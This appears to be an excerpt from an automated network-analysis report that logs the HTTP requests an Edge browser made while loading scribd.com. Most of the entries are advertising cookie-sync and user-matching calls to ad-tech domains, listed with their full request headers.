Source: global trafficHTTP traffic detected: GET /cs?fwrd=1&aid=11571&id=88d7ae9b-757d-4195-ad7d-f0171149038f&gdpr_consent=null&gdpr=0 HTTP/1.1Host: cs-server-s2s.yellowblue.ioConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: wrvUserID=z4Tmd3x9kp_s
Source: global trafficHTTP traffic detected: GET /usersync2/rmpssp?sub=zeta&gdpr=0&gdpr_consent=&us_privacy=&redir=https%3A%2F%2Fssp.disqus.com%2Fmatch%3Fbidder%3D37%26buyeruid%3D%5BRX_UUID%5D%26r%3DCid1YS1hNDc3YzRhYi01MjNlLTM3MDQtODA5My04YzVjYTM0ZjY3OGIqYmh0dHBzOi8vY3Mtc2VydmVyLXMycy55ZWxsb3dibHVlLmlvL2NzP2Z3cmQ9MSZhaWQ9MTE2MTImaWQ9dWEtYTQ3N2M0YWItNTIzZS0zNzA0LTgwOTMtOGM1Y2EzNGY2NzhiMgIlGzgB HTTP/1.1Host: sync.1rx.ioConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /cm-notify?pi=rise&tc=1 HTTP/1.1Host: creativecdn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: ts=1739863027
Source: global trafficHTTP traffic detected: GET /usersync2/rmpssp?sub=typeaholdings&zcc=1&cb=1739862995510 HTTP/1.1Host: sync.1rx.ioConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /pbsync?gdpr=0&gdpr_consent=&is=rise&redirectUri=https%3A%2F%2Fcs-server-s2s.yellowblue.io%2Fcs%3Ffwrd%3D1%26aid%3D11584%26uid%3D%24UID&us_privacy= HTTP/1.1Host: ads.yieldmo.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /cs?aid=11587&uid=af24be0b-9eaa-4e93-b086-26a79da7677b&gdpr=0 HTTP/1.1Host: cs.yellowblue.ioConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: wrvUserID=z4Tmd3x9kp_s
Source: global trafficHTTP traffic detected: GET /lb/v1 HTTP/1.1Host: lb.eu-1-id5-sync.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Content-Type: text/plainAccept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /cs?fwrd=1&aid=11563&id=2a8114f0-34da-4d1c-8de4-4aa94395f761 HTTP/1.1Host: cs-server-s2s.yellowblue.ioConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: wrvUserID=z4Tmd3x9kp_s
Source: global trafficHTTP traffic detected: GET /check_uuid/https%3A%2F%2Fcs-server-s2s.yellowblue.io%2Fcs%3Faid%3D11603%26gdpr%3D%5BGDPR%5D%26gdpr_consent%3D%5BUSER_CONSENT%5D%26uid%3D$%7BBSW_UUID%7D HTTP/1.1Host: x.bidswitch.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /getuid?https%3A%2F%2Fcs-server-s2s.yellowblue.io%2Fcs%3Ffwrd%3D1%26aid%3D11596%26gdpr%3D%5BGDPR%5D%26gdpr_consent%3D%5BUSER_CONSENT%5D%26id%3D%24UID HTTP/1.1Host: ib.adnxs.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: XANDR_PANID=yoDWIi40QA0l92CMfnRGTVK6j8ph7xMEE2hovwWpxM3jlu8-JszEEuNouxtI9R3D-QUOCwsGww6GCGm89qzRlyyUz_8TuJUoh7BvVk-kenM.; receive-cookie-deprecation=1
Source: global trafficHTTP traffic detected: GET /user-matching?gdpr=0&gdpr_consent=&id=3663 HTTP/1.1Host: ads.stickyadstv.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /c/?adExInit=rise&gdpr=%5BGDPR%5D&gdpr_consent=%5BUSER_CONSENT%5D&redir=https%3A%2F%2Fcs-server-s2s.yellowblue.io%2Fcs%3Ffwrd%3D1%26aid%3D11574%26id%3D%24UID HTTP/1.1Host: s.ad.smaato.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /sync?redirect=https%3A%2F%2Fcs-server-s2s.yellowblue.io%2Fcs%3Ffwrd%3D1%26aid%3D11595%26id%3D%7BID5UID%7D&gdpr_consent=&gdpr=0&us_privacy=&gdpr_pd=&source=5&google_push=&retry=true HTTP/1.1Host: sync.inmobi.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /usersync2/rmpssp?sub=zeta&zcc=1&redir=https%3A%2F%2Fssp.disqus.com%2Fmatch%3Fbidder%3D37%26buyeruid%3D%5BRX_UUID%5D%26r%3DCid1YS1hNDc3YzRhYi01MjNlLTM3MDQtODA5My04YzVjYTM0ZjY3OGIqYmh0dHBzOi8vY3Mtc2VydmVyLXMycy55ZWxsb3dibHVlLmlvL2NzP2Z3cmQ9MSZhaWQ9MTE2MTImaWQ9dWEtYTQ3N2M0YWItNTIzZS0zNzA0LTgwOTMtOGM1Y2EzNGY2NzhiMgIlGzgB&cb=1739863028401 HTTP/1.1Host: sync.1rx.ioConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: geo.privacymanager.ioConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /cksync.php?cs=25&gdpr=%5BGDPR%5D&gdpr_consent=%5BUSER_CONSENT%5D&ovsid=%7B%7BAPID%7D%7D&redirect=https%3A%2F%2Fcs-server-s2s.yellowblue.io%2Fcs%3Ffwrd%3D1%26aid%3D11585%26id%3D%3Cvsid%3E&type=ris HTTP/1.1Host: contextual.media.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /AdServer/ImgSync?gdpr=0&gdpr=0&gdpr_consent=&gdpr_consent=&p=160295&pu=https%3A%2F%2Fcs-server-s2s.yellowblue.io%2Fcs%3Ffwrd%3D1%26aid%3D11576%26id%3D%23PMUID HTTP/1.1Host: image8.pubmatic.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /cs?fwrd=1&aid=11584&uid=x_7JdzzTT9zdixp6qPn6&gdpr=0&gdpr_consent=&us_privacy= HTTP/1.1Host: cs-server-s2s.yellowblue.ioConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: wrvUserID=z4Tmd3x9kp_s
Source: global trafficHTTP traffic detected: GET /cs?aid=11599&id=OPTOUT HTTP/1.1Host: cs.yellowblue.ioConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: wrvUserID=z4Tmd3x9kp_s
Source: global trafficHTTP traffic detected: GET /api/sync?callerId=77&gdpr=0&gdpr_consent= HTTP/1.1Host: ssbsync.smartadserver.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /webfonts43j533.js HTTP/1.1Host: cdn.btmessage.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /getuid?https%3A%2F%2Fonetag-sys.com%2Fmatch%2F%3Fint_id%3D98%26uid%3D$UID&gdpr=0&gdpr_consent= HTTP/1.1Host: ib.adnxs.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://onetag-sys.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: XANDR_PANID=yoDWIi40QA0l92CMfnRGTVK6j8ph7xMEE2hovwWpxM3jlu8-JszEEuNouxtI9R3D-QUOCwsGww6GCGm89qzRlyyUz_8TuJUoh7BvVk-kenM.; receive-cookie-deprecation=1
Source: global trafficHTTP traffic detected: GET /px.gif?ch=2 HTTP/1.1Host: ad-delivery.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8If-None-Match: "ad4b0f606e0f8465bc4c4c170b37e1a3"If-Modified-Since: Wed, 05 May 2021 19:25:32 GMT
Source: global trafficHTTP traffic detected: GET /AdServer/ImgSync?p=159706&gdpr=0&gdpr_consent=&us_privacy=&pu=https%3A%2F%2Fonetag-sys.com%2Fmatch%2F%3Fint_id%3D114%26gdpr%3D${GDPR}%26gdpr_consent%3D${GDPR_STRING}%26uid%3D%23PMUID HTTP/1.1Host: image8.pubmatic.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://onetag-sys.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /user-matching?id=3679&gdpr=0&gdpr_consent= HTTP/1.1Host: ads.stickyadstv.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://onetag-sys.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /pixel?google_nid=onetag_eb&gdpr=0&gdpr_consent=&google_cm HTTP/1.1Host: cm.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://onetag-sys.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /c/882/0/8/1.gif?gdpr=0&gdpr_consent=&us_privacy= HTTP/1.1Host: id5-sync.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /sync?ssp=onetag&ssp_user_id=x4HSla-C8F-0K3hnC_hqmnyTkFOSzuiQFnnpxPnX6P4&gdpr=0&gdpr_consent= HTTP/1.1Host: rtb.mfadsrvr.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://onetag-sys.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /usermatch?d=https%3A%2F%2Fwww.scribd.com%2F&s=184674&cb=https%3A%2F%2Fcdn.indexww.com%2Fht%2Fhtw-pixel.gif%3F HTTP/1.1Host: ssum-sec.casalemedia.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://js-sec.indexww.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: receive-cookie-deprecation=1
Source: global trafficHTTP traffic detected: GET /api/sync?callerId=5&gdpr=0&gdpr_consent=&us_privacy=&redirectUri=https%3A%2F%2Fonetag-sys.com%2Fmatch%2F%3Fint_id%3D107%26uid%3D[ssb_sync_pid] HTTP/1.1Host: ssbsync-global.smartadserver.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://onetag-sys.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /usync.js HTTP/1.1Host: eus.rubiconproject.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://eus.rubiconproject.com/usync.html?endpoint=us-east&p=rise_engageAccept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: khaos_p=M7A5IT3R-G-GNOQ; audit_p=1|p3NZOIPdcs7g2WF2nGvUU+SRTrMPTneuTTZKI3TR72YkDyl9IZRjbpAY6ebCcuOOT6F3oGgylxdCbuL7wqM7W24/AOYgyMTzmjbisE4m2Mfme0rGRDIQp2HZvLHXgE7qKreeM+I17A+st7tELqFbcc9dWb1LRf1hfY0V14FIbwNNc4QTpadywtzpQ7vzkXQ/; receive-cookie-deprecation=1
